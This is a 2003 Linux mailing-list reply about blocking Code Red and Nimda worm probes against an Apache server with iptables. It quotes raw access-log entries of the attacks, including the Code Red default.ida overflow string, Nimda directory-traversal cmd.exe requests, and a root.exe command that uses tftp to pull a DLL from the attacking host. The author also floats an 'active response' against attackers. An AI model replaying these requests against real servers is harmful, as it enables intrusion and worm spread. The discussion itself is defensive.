On Fri, 14 Mar 2003 16:50:15 -0800 Dave Laird <[EMAIL PROTECTED]> wrote:
> -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Good evening, Pierre... > > On Friday 14 March 2003 04:27 pm, Pierre Fortin wrote: > > > On the _passive_ side, I have some ideas for short-circuiting Nimda > > attacks with iptables. > > [Dave sits upright in his chair from sleeping through the flame wars and > wriggles with impatience] Are you referring to a thing I read a few > weeks back about using "strings" in iptables to deflect Code Red? I've > started a time or two to explore this in more detail, but if you have an > idea that either does/does not follow that platform, I'm *ALL* ears. At > least in principle the "strings" idea should work. > > Dave Got a pointer to the "strings' stuff...? I'm running 8.2 on my main server (9.0 issues)... The way I see it is this: CodeRed is a single whack at my box from any IP address... I forget which is V1 and V2; but I got 22 of these yesterday: 64.53.28.118 - - [13/Mar/2003:00:07:35 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u 0000%u00=a HTTP/1.0" 200 538 "-" "-" and only this one: 24.102.21.122 - - [13/Mar/2003:19:42:36 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090% u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u 0000%u00=a HTTP/1.0" 400 347 "-" "-" Nimda looks like this: 64.53.219.105 - - [13/Mar/2003:20:25:22 -0500] "GET /scripts/httpodbc.dll HTTP/1.0" 404 - "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:23 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:24 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:24 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:24 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:25 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:25 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 310 "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:25 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 310 "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:25 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.53.219.105 - - [13/Mar/2003:20:25:26 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.53.219.105 - - [13/Mar/2003:20:30:23 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 58 "-" "-" 64.53.219.105 - - [13/Mar/2003:20:30:23 -0500] "GET /scripts/root.exe?/c+tftp%20-i%2064.53.219.105%20GET%20cool.dll%20httpodb c.dll HTTP/1.0" 200 58 "-" "-" or, the first time I've noticed, simply like this: 212.129.198.49 - - [13/Mar/2003:04:34:29 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 - "-" "-" 212.129.198.49 - - [13/Mar/2003:04:34:30 -0500] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 404 - "-" "-" So... not much to be done about CodeRed, other than an _active_ response to try and shutdown the offending process... hopefully without harming the attacker [too much]... While Nimda may be similarly responded to, the alternative is to use a _passive_ response... block subsequent packets with iptables... This, I've toyed with in several ways... the one I prefer; but still need to debug is having apache write $REMOTE_ADDR to a pipe which is connected to a listener that can issue an immediate 'drop $REMOTE_ADDR 80', a script I wrote -- and currently reworking -- which creates an iptables entry, and saves the info for refreshing/reloading iptables after a reboot, etc... Altough, to keep the iptables short so as not to impact performance too much, I'm moving towards blocking the Nimda packets for a few minutes, then removing the block. OOPPPPSSSS..... doing a quick review of this msg, I just noticed for the first time that the Nimda attack is not in the usual order... looks like my "bug" is not providing for all possibilities and using the first one to arrive... :^P I've been focusing on "GET /scripts/root.exe"... What have you tried in this matter? Feel free to take this thread offline -- we can summarize back...
Want to buy your Pack or Services from MandrakeSoft? Go to http://www.mandrakestore.com
